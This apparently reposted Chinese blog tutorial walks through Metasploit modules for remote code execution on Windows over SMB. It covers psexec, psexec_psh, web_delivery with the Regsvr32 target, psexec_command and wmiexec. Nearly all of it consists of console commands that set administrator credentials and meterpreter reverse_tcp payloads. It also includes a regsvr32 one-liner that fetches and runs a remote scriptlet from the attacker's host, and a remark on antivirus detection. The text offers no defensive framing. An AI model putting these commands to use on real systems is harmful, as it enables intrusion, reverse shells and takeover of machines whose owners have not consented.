内容简介:使用exploit/multi/script/web_delivery 生成恶意dll代码
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 192.168.2.118
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass P@ssw0rd
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set LHOST 192.168.2.145
msf exploit(windows/smb/psexec) > set LPORT 4444
msf exploit(windows/smb/psexec) > exploit
exploit/windows/smb/psexec_psh
msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set rhost 192.168.2.118
msf exploit(windows/smb/psexec_psh) > set smbuser administrator
msf exploit(windows/smb/psexec_psh) > set smbpass P@ssw0rd
msf exploit(windows/smb/psexec_psh) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec_psh) > set lhost 192.168.2.145
msf exploit(windows/smb/psexec_psh) > set lport 4444
msf exploit(windows/smb/psexec_psh) > exploit
exploit/multi/script/web_delivery
使用exploit/multi/script/web_delivery 生成恶意dll代码
msf > use exploit/multi/script/web_delivery msf exploit(multi/script/web_delivery) > show targets Exploit targets: Id Name --- 0 Python 1 PHP 2 PSH 3 Regsvr32 4 PSH (Binary) msf exploit(multi/script/web_delivery) > set target 3 msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/script/web_delivery) > set lhost 192.168.2.145 msf exploit(multi/script/web_delivery) > set lport 4444 msf exploit(multi/script/web_delivery) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.2.145:4444 [*] Using URL: http://0.0.0.0:8080/s7sa27EEtl [*] Local IP: http://192.168.2.145:8080/s7sa27EEtl [*] Server started. [*] Run the following command on the target machine: regsvr32 /s /n /u /i:http://192.168.2.145:8080/s7sa27EEtl.sct scrobj.dll
auxiliary/admin/smb/psexec_command
使用 auxiliary/admin/smb/psexec_command 在远程目标上执行命令种恶意 dll 回连 meterpreter ;
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set rhosts 192.168.2.118
msf auxiliary(admin/smb/psexec_command) > set smbuser admin1
msf auxiliary(admin/smb/psexec_command) > set smbpass P@ssw0rd
msf auxiliary(admin/smb/psexec_command) > set command regsvr32 /s /n /u /i:http://192.168.2.145:8080/s7sa27EEtl.sct scrobj.dll
msf auxiliary(admin/smb/psexec_command) > set payload windows/meterpreter/reverse_tcp
msf auxiliary(admin/smb/psexec_command) > set lhost 192.168.2.145
msf auxiliary(admin/smb/psexec_command) > set lport 4444
msf auxiliary(admin/smb/psexec_command) > exploit
经实验表明,当目标机器有杀毒软件的时候,会拦截其从服务器上下载恶意 dll 文件 s7sa27EEtl.sct (测试机为赛门铁克未授权版),毕竟 msf 的恶意dll 特征码已经被杀毒引擎收录,如果确定目标机其没有杀软便可使用。
auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(admin/smb/psexec_command) > use auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(scanner/smb/impacket/wmiexec) > set rhosts 192.168.2.118
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbuser admin1
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbpass P@ssw0rd
msf auxiliary(scanner/smb/impacket/wmiexec) > set command ipconfig /all
msf auxiliary(scanner/smb/impacket/wmiexec) > exploit
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
- Nginx+Tomcat实现80端口转发8080端口
- 猎鹰网络安全工具新功能:主机端口扫描可以自定义端口范围
- nginx代理其他端口到80端口-低调小熊猫的技术小黑屋
- 浅析Linux网络端口
- 443端口共用的方案
- 端口复用
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Persuasive Technology
B.J. Fogg / Morgan Kaufmann / 2002-12 / USD 39.95
Can computers change what you think and do? Can they motivate you to stop smoking, persuade you to buy insurance, or convince you to join the Army? "Yes, they can," says Dr. B.J. Fogg, directo......一起来看看 《Persuasive Technology》 这本书的介绍吧!
SHA 加密
SHA 加密工具
RGB CMYK 转换工具
RGB CMYK 互转工具